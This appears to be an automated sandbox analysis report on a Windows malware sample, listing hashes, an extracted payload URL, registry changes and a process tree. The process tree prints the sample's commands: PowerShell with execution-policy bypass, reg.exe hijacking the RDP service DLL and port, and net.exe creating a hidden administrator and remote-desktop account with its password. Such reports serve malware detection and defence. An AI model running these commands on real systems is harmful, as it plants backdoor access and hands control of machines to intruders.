Analysis
-
max time kernel
62s -
max time network
115s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
20-08-2021 20:46
Static task
static1
Behavioral task
behavioral1
Sample
3cb66d271255d59945381fdc6fab9b91.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
3cb66d271255d59945381fdc6fab9b91.exe
Resource
win10v20210408
General
-
Target
3cb66d271255d59945381fdc6fab9b91.exe
-
Size
5.9MB
-
MD5
3cb66d271255d59945381fdc6fab9b91
-
SHA1
cba5bc5d238ffa84cadb81d8ac65c81c289ec74a
-
SHA256
5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa
-
SHA512
770a6f375c8ba6c3c4a7da63652b58ccac9a3a0c005cf1cfc8db21447ae247bcc705c8f20da683ca89e1f0102604e23310be76c4c5daf358f81d2b36008c9a75
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 17 4004 powershell.exe 19 4004 powershell.exe 20 4004 powershell.exe 21 4004 powershell.exe 23 4004 powershell.exe 25 4004 powershell.exe 27 4004 powershell.exe 29 4004 powershell.exe 31 4004 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 576 576 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_cl2he5jg.rlx.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1108.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xdotdir5.oah.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1176.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1197.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI11F5.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1216.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2424 powershell.exe 2424 powershell.exe 2424 powershell.exe 2164 powershell.exe 2164 powershell.exe 2164 powershell.exe 3176 powershell.exe 3176 powershell.exe 3176 powershell.exe 3968 powershell.exe 3968 powershell.exe 3968 powershell.exe 2424 powershell.exe 2424 powershell.exe 2424 powershell.exe 4004 powershell.exe 4004 powershell.exe 4004 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
3cb66d271255d59945381fdc6fab9b91.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 860 3cb66d271255d59945381fdc6fab9b91.exe Token: SeDebugPrivilege 2424 powershell.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeIncreaseQuotaPrivilege 2164 powershell.exe Token: SeSecurityPrivilege 2164 powershell.exe Token: SeTakeOwnershipPrivilege 2164 powershell.exe Token: SeLoadDriverPrivilege 2164 powershell.exe Token: SeSystemProfilePrivilege 2164 powershell.exe Token: SeSystemtimePrivilege 2164 powershell.exe Token: SeProfSingleProcessPrivilege 2164 powershell.exe Token: SeIncBasePriorityPrivilege 2164 powershell.exe Token: SeCreatePagefilePrivilege 2164 powershell.exe Token: SeBackupPrivilege 2164 powershell.exe Token: SeRestorePrivilege 2164 powershell.exe Token: SeShutdownPrivilege 2164 powershell.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeSystemEnvironmentPrivilege 2164 powershell.exe Token: SeRemoteShutdownPrivilege 2164 powershell.exe Token: SeUndockPrivilege 2164 powershell.exe Token: SeManageVolumePrivilege 2164 powershell.exe Token: 33 2164 powershell.exe Token: 34 2164 powershell.exe Token: 35 2164 powershell.exe Token: 36 2164 powershell.exe Token: SeDebugPrivilege 3176 powershell.exe Token: SeIncreaseQuotaPrivilege 3176 powershell.exe Token: SeSecurityPrivilege 3176 powershell.exe Token: SeTakeOwnershipPrivilege 3176 powershell.exe Token: SeLoadDriverPrivilege 3176 powershell.exe Token: SeSystemProfilePrivilege 3176 powershell.exe Token: SeSystemtimePrivilege 3176 powershell.exe Token: SeProfSingleProcessPrivilege 3176 powershell.exe Token: SeIncBasePriorityPrivilege 3176 powershell.exe Token: SeCreatePagefilePrivilege 3176 powershell.exe Token: SeBackupPrivilege 3176 powershell.exe Token: SeRestorePrivilege 3176 powershell.exe Token: SeShutdownPrivilege 3176 powershell.exe Token: SeDebugPrivilege 3176 powershell.exe Token: SeSystemEnvironmentPrivilege 3176 powershell.exe Token: SeRemoteShutdownPrivilege 3176 powershell.exe Token: SeUndockPrivilege 3176 powershell.exe Token: SeManageVolumePrivilege 3176 powershell.exe Token: 33 3176 powershell.exe Token: 34 3176 powershell.exe Token: 35 3176 powershell.exe Token: 36 3176 powershell.exe Token: SeDebugPrivilege 3968 powershell.exe Token: SeIncreaseQuotaPrivilege 3968 powershell.exe Token: SeSecurityPrivilege 3968 powershell.exe Token: SeTakeOwnershipPrivilege 3968 powershell.exe Token: SeLoadDriverPrivilege 3968 powershell.exe Token: SeSystemProfilePrivilege 3968 powershell.exe Token: SeSystemtimePrivilege 3968 powershell.exe Token: SeProfSingleProcessPrivilege 3968 powershell.exe Token: SeIncBasePriorityPrivilege 3968 powershell.exe Token: SeCreatePagefilePrivilege 3968 powershell.exe Token: SeBackupPrivilege 3968 powershell.exe Token: SeRestorePrivilege 3968 powershell.exe Token: SeShutdownPrivilege 3968 powershell.exe Token: SeDebugPrivilege 3968 powershell.exe Token: SeSystemEnvironmentPrivilege 3968 powershell.exe Token: SeRemoteShutdownPrivilege 3968 powershell.exe Token: SeUndockPrivilege 3968 powershell.exe Token: SeManageVolumePrivilege 3968 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3cb66d271255d59945381fdc6fab9b91.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 860 wrote to memory of 2424 860 3cb66d271255d59945381fdc6fab9b91.exe powershell.exe PID 860 wrote to memory of 2424 860 3cb66d271255d59945381fdc6fab9b91.exe powershell.exe PID 2424 wrote to memory of 1464 2424 powershell.exe csc.exe PID 2424 wrote to memory of 1464 2424 powershell.exe csc.exe PID 1464 wrote to memory of 2084 1464 csc.exe cvtres.exe PID 1464 wrote to memory of 2084 1464 csc.exe cvtres.exe PID 2424 wrote to memory of 2164 2424 powershell.exe powershell.exe PID 2424 wrote to memory of 2164 2424 powershell.exe powershell.exe PID 2424 wrote to memory of 3176 2424 powershell.exe powershell.exe PID 2424 wrote to memory of 3176 2424 powershell.exe powershell.exe PID 2424 wrote to memory of 3968 2424 powershell.exe powershell.exe PID 2424 wrote to memory of 3968 2424 powershell.exe powershell.exe PID 2424 wrote to memory of 2312 2424 powershell.exe reg.exe PID 2424 wrote to memory of 2312 2424 powershell.exe reg.exe PID 2424 wrote to memory of 576 2424 powershell.exe reg.exe PID 2424 wrote to memory of 576 2424 powershell.exe reg.exe PID 2424 wrote to memory of 1152 2424 powershell.exe reg.exe PID 2424 wrote to memory of 1152 2424 powershell.exe reg.exe PID 2424 wrote to memory of 4088 2424 powershell.exe net.exe PID 2424 wrote to memory of 4088 2424 powershell.exe net.exe PID 4088 wrote to memory of 1436 4088 net.exe net1.exe PID 4088 wrote to memory of 1436 4088 net.exe net1.exe PID 2424 wrote to memory of 3852 2424 powershell.exe cmd.exe PID 2424 wrote to memory of 3852 2424 powershell.exe cmd.exe PID 3852 wrote to memory of 3932 3852 cmd.exe cmd.exe PID 3852 wrote to memory of 3932 3852 cmd.exe cmd.exe PID 3932 wrote to memory of 3524 3932 cmd.exe net.exe PID 3932 wrote to memory of 3524 3932 cmd.exe net.exe PID 3524 wrote to memory of 2060 3524 net.exe net1.exe PID 3524 wrote to memory of 2060 3524 net.exe net1.exe PID 2424 wrote to memory of 3028 2424 powershell.exe cmd.exe PID 2424 wrote to memory of 3028 2424 powershell.exe cmd.exe PID 3028 wrote to memory of 496 3028 cmd.exe cmd.exe PID 3028 wrote to memory of 496 3028 cmd.exe cmd.exe PID 496 wrote to memory of 2292 496 cmd.exe net.exe PID 496 wrote to memory of 2292 496 cmd.exe net.exe PID 2292 wrote to memory of 2312 2292 net.exe net1.exe PID 2292 wrote to memory of 2312 2292 net.exe net1.exe PID 2324 wrote to memory of 3928 2324 cmd.exe net.exe PID 2324 wrote to memory of 3928 2324 cmd.exe net.exe PID 3928 wrote to memory of 3840 3928 net.exe net1.exe PID 3928 wrote to memory of 3840 3928 net.exe net1.exe PID 768 wrote to memory of 3584 768 cmd.exe net.exe PID 768 wrote to memory of 3584 768 cmd.exe net.exe PID 3584 wrote to memory of 3692 3584 net.exe net1.exe PID 3584 wrote to memory of 3692 3584 net.exe net1.exe PID 4088 wrote to memory of 2188 4088 cmd.exe net.exe PID 4088 wrote to memory of 2188 4088 cmd.exe net.exe PID 2188 wrote to memory of 3268 2188 net.exe net1.exe PID 2188 wrote to memory of 3268 2188 net.exe net1.exe PID 3488 wrote to memory of 2672 3488 cmd.exe net.exe PID 3488 wrote to memory of 2672 3488 cmd.exe net.exe PID 2672 wrote to memory of 1064 2672 net.exe net1.exe PID 2672 wrote to memory of 1064 2672 net.exe net1.exe PID 3828 wrote to memory of 4084 3828 cmd.exe net.exe PID 3828 wrote to memory of 4084 3828 cmd.exe net.exe PID 4084 wrote to memory of 2184 4084 net.exe net1.exe PID 4084 wrote to memory of 2184 4084 net.exe net1.exe PID 3692 wrote to memory of 736 3692 cmd.exe net.exe PID 3692 wrote to memory of 736 3692 cmd.exe net.exe PID 736 wrote to memory of 4000 736 net.exe net1.exe PID 736 wrote to memory of 4000 736 net.exe net1.exe PID 3268 wrote to memory of 2672 3268 cmd.exe WMIC.exe PID 3268 wrote to memory of 2672 3268 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3cb66d271255d59945381fdc6fab9b91.exe"C:\Users\Admin\AppData\Local\Temp\3cb66d271255d59945381fdc6fab9b91.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lcnd1suy\lcnd1suy.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB079.tmp" "c:\Users\Admin\AppData\Local\Temp\lcnd1suy\CSCFAAD2F90B96C460FA87F33275A183EC.TMP"4⤵PID:2084
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3968 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2312
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:576 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1152
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1436
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2060
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:496 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2312
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:496
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2364
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3840
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc YsAAvQra /add1⤵
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc YsAAvQra /add2⤵
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc YsAAvQra /add3⤵PID:3692
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:3268
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:1064
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:2184
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc YsAAvQra1⤵
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc YsAAvQra2⤵
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc YsAAvQra3⤵PID:4000
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:3268 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:2672
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2276
-
